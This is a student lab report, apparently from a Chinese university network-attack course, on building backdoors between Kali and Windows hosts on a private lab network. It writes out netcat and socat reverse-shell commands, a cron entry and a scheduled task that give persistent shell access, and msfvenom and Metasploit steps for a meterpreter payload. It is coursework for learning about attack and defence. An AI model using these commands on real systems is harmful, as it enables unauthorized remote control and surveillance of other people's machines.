2018-2019-2 20162318《网络对抗技术》Exp2 后门原理与实践
一、实验内容
1.使用netcat获取主机操作Shell,cron启动
2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝
二、实验步骤
2.1 使用netcat获取主机操作Shell,cron启动
2.1.1 windows下获得一个linux shell
step1. 在Windows中使用ipconfig查看本机ip地址
step2. 在Windows中使用ncat.exe程序打开监听
ncat.exe -l -p 2318
step3. 在kali中反弹连接Windows
ncat 192.168.88.1 2318 -e /bin/sh
step4. Windows成功获得kali的shell,并使用ls命令查看当前目录
2.1.2 Linux 下获得Windows的cmd程序,cron启动
step1.
在Windows系统下,监听2318端口
ncat.exe -l -p 2318
step2.在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择3
step3.在最后一行添加
10 * * * * /bin/netcat 192.168.88.1 2318 -e /bin/sh //在每小时的第10分钟反向连接Windows主机的2318端口
step4.时间到达10分时,如下图所示:
2.2 使用socat获取主机操作Shell, 任务计划启动
2.2.1 Linux 下获得Windows的cmd程序
step1.在kali中使用ifconfig查看IP
step2.在kali中打开监听
nc -l -p 2318
step3.在Windows中反弹连接kali
ncat.exe -e cmd.exe 192.168.187.128 2318
step4.kali成功获得Windows的命令提示,并使用dir命令查看当前目录
2.2.2 使用socat获取主机操作Shell, 任务计划启动
step1.在“任务计划程序”中“创建任务”
step2.填写任务名
step3.填写触发器
step4.填写操作,导入socat.exe的路径,并添加参数:tcp-listen:2318 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口2318,同时把cmd.exe的stderr重定向到stdout上)
step5.到达约定时间后,在Kali环境下输入指令
socat -tcp:192.168.88.1:2318
此时可以发现已经成功获得了WINDOWSd的cmd shell
2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
step1.在Kali上执行指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.187.128 LPORT=2318 -f exe > 20162318_backdoor.exe
step2.在Windows下执行
ncat.exe -lv 2318 > 20162318_backdoor.exe
step3.在Linux中执行
nc 192.168.88.1 2318 < 20162318_backdoor.exe
step4.在Kali上输入msfconsole指令进入msf控制台
root@20162318:~# msfconsole
step5.依次输入
use exploit/multi/handler //使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp /使用和生成后门程序时相同的payload
set LHOST 192.168.187.128 //设置ip
set LPORT 2318 //设置端口
step6.使用exploit开始监听
step7.运行Windows下的后门程序
step8.Linux获得Windows主机的连接,并且得到了远程控制的shell
2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
step1.完成2.3的全部操作
step2.使用screenshot指令进行截屏
step3.尝试提权和获取摄像头权限失败
三、基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
当我们打开一个钓鱼邮件时,如果后台自动下载并安装木马程序,自动运行,因此在系统留下后门。
下载游戏修改器也可能会有后门
(2)例举你知道的后门如何启动起来(win及linux)的方式?
打开一些游戏的作弊器
通过修改注册表设置为开机自启动
(3)Meterpreter有哪些给你映像深刻的功能
截取受害主机的图片,获取录音等等
(4)如何发现自己有系统有没有被安装后门?
定期使用杀毒软件进行杀毒
四、实验总结与体会
本次实验使我明白了后门的可怕之处,所以以后要在正规网站下载正规软件,不下载游戏外挂之类可能会藏有后门的软件,其次是定期使用杀毒软件进行杀毒,防止存在有后门软件的软件的存在。
2018-2019-2 20162318《网络对抗技术》Exp2 后门原理与实践的更多相关文章
- 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践
2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...
- 20155326刘美岑 《网络对抗》Exp2 后门原理与实践
20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155320《网络对抗》Exp2 后门原理与实践
20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 20155208徐子涵《网络对抗》Exp2 后门原理与实践
20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...
- 20145236《网络对抗》Exp2 后门原理与实践
20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...
- 20155202 张旭《网络对抗》Exp2 后门原理与实践
20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...
- 20155218《网络对抗》Exp2 后门原理与实践
20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...
- 20155227《网络对抗》Exp2 后门原理与实践
20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...
- 20155232《网络对抗》Exp2 后门原理与实践
20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...
随机推荐
- Unix/Linux系统时间函数API
首先说明关于几个时间的概念: 世界时:起初,国际上的标准时间是格林尼治标准时间,以太阳横穿本初子午线的时刻为标准时间正午12点.它根据天文环境来定义,就像古代人们根据日晷来计时一样,如下图: 原子时: ...
- 【SLAM】安装 g2o_viewer
2017年2月8日,那是一个阴天.为了完成高翔博士的<一起做RGB-D SLAM>教程,我在 Ubuntu 14.04 安装 g2o.遇到困难,怎奈我眼瞎,找错了方向,浪费时间,没有成功安 ...
- 【codeforces】【比赛题解】#948 CF Round #470 (Div.2)
[A]Protect Sheep 题意: 一个\(R*C\)的牧场中有一些羊和一些狼,如果狼在羊旁边就会把羊吃掉. 可以在空地上放狗,狼不能通过有狗的地方,狼的行走是四联通的. 问是否能够保护所有的羊 ...
- 1 - django-介绍-MTV-命令-基础配置-admin
目录 1 什么是web框架 2 WSGI 3 MVC与MTV模式 3.1 MVC框架 3.2 MTV框架 3.3 区别 4 django介绍 4.1 Django处理顺序 4.2 创建django站点 ...
- ntpdate[35450]: the NTP socket is in use, exiting
当前主机已是NTP服务器,需关闭当前NTP服务,再同步其他NTP服务器的时间 service ntpd stop 然后ps -ef | grep ntp看进程是否已杀掉 然后再次ntpdate Ser ...
- aarch64_m3
mrpt-stereo-camera-calibration-1.4.0-1.fc26.aarch64.rpm 2017-03-17 10:02 143K fedora Mirroring Proje ...
- Mac 升级一次,php 就崩溃一次,有味,苹果....
Mac升级系统macOS Sierra后PHP不编译 Mac下搭建PHP开发环境(Apache+PHP+MySQL+phpMyAdmin),当Mac 从OS 10.11升级至macOS Sierra( ...
- HTML5 localStorage、sessionStorage 作用域
一.localStorage localStorage有效期:永不失效,除非web应用主动删除. localStorage作用域:localStorage的作用域是限定在文档源级别的.文档源通过协议. ...
- Android 浏览器启动应用程序
点击浏览器中的URL链接,启动特定的App. 首先做成HTML的页面,页面内容格式如下: <a href="[scheme]://[host]/[path]?[query]" ...
- linux nc命令使用详解(转)
linux nc命令使用详解 功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o& ...